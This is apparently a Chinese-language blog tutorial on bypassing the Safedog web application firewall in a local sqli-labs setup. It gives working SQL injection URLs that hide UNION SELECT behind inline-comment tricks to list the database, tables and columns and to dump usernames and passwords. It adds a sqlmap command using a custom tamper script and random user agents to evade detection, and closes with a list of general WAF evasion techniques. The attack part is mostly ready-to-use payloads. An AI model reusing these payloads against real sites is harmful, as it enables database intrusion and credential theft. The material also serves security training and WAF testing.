WAF Bypass 介绍与实战
前言WAF是英文"Web Application Firewall"的缩写,中文意思是"Web应用防火墙",也称为"网站应用级入侵防御系统"。WAF是集WEB防护、网页保护、负载均衡、应用交付于一体的WEB整体安全防护设备
WAF从形态上可分为硬件WAF、WAF防护软件和云WAF
以下仅介绍软件WAF及其简单绕过:安全狗
安全狗环境安装
就以安全狗为例进行安装并测试
以管理员身份打开cmd
cd C:\phpstudy\PHPTutorial\Apache\bin//进入phpstudy的apache目录的bin目录
httpd.exe -k install -n apahce2.4
cd C:\phpstudy\PHPTutorial\MySQL\bin//进入phpstudy的mysql目录的bin目录
mysqld --install mysqlhttps://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214215824746-760042202.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214220418669-595106286.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214220650415-2001042978.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214220730075-1926202478.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214221124230-1005285027.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214221326474-370698111.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214221520299-499431944.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214222144597-1157181820.png
一、Burp配合进行ByPass
使用burp抓包爆破关键字进行绕过测试
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216185652381-1989861369.png
由于union与select联合用时会出现waf拦截,有时候单个出现union或者select都会出现拦截
我们将union和select之间的空格进行替换字符绕过waf,对标记的字符进行替换爆破,查看到正常显示字符的长度则绕过成功
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216203648640-1492598956.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216213849673-219789757.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216214236886-103448146.png
以下绕过均采用burp配合手工进行猜解爆破
SQL注入的Waf ByPass
以下以sqli-labs为例进行绕过测试
判断字段数
http://192.168.31.198/sqli-labs/Less-1/?id=1%27%20order/*%2f%2f!*/by%204%23https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216214718500-1723458749.png
联合查询显示位
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,2,3%23https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216183956615-1419611987.png
查数据库
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,database/*%2f%2f!*/(/*%2f%2f!*/),3%23https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216183914822-1994547594.png
查表
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,2,group_concat(table_name)from/*!--+/*%0A(information_schema.tables)*//*%2f%2f!*/where/*%2f%2f!*/table_schema=%22security%22%23https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216184043280-562990899.png
查字段
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,2,group_concat(column_name)from/*!--+/*%0A(information_schema.columns)*//*%2f%2f!*/where/*%2f%2f!*/table_schema=%22security%22%20and/*%2f-*!%2f*/table_name=%22users%22%23https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216184121498-495681410.png
查数据
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,group_concat(username),group_concat(password)from%20users%23https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216184154223-1575906727.png
二、自动化脚本测试绕过
将绕过脚本添加进sqlmap自带脚本tamper库里,并使用sqlmap自动化扫描测试
sqlmap -u "http://192.168.31.198/sqli-labs/Less-1/?id=1" --tamper=anquangou --random-agent
注:--tamper=anquangou 使用的是绕过安全狗的脚本
--random-agent 开启随机ua头是因为安全狗会自动开启识别自动化探测器如sqlmap或者其他盲注自动化探测器等,然后将其拦截,开启随机ua头是为了绕过ua头为sqlmap不被拦截https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216220515428-1741493095.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216221032095-292162402.png
总结
1.在正常绕过市面上的waf都是这些基础waf的变种,可以利用手工配合burp猜解waf绕过关键字
2.可以利用服务器的特性如 :替换为%u0053特殊字符,替换传参方式紊乱系统传参等
3.可以利用应用层方面的特性如:简单的大小写绕过,双写关键字,url多重编码,参数污染等
4.可以利用WAF层特性如:在开发云WAF、软件WAF、硬件WAF中出现逻辑问题(对00截断无法获取识别%00后面的字符从而绕过)、性能问题(频繁使用burp爆破、条件竞争会出现waf性能下降无法识别拦截)
5.可以利用数据库特性如:数据库语句可以将空格替换成换行符,或者其他可绕过字符,像SQL语句的五大位置可绕过区域
6.可以利用已写好的自动化测试脚本,采用sqlmap自动化扫描测试
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]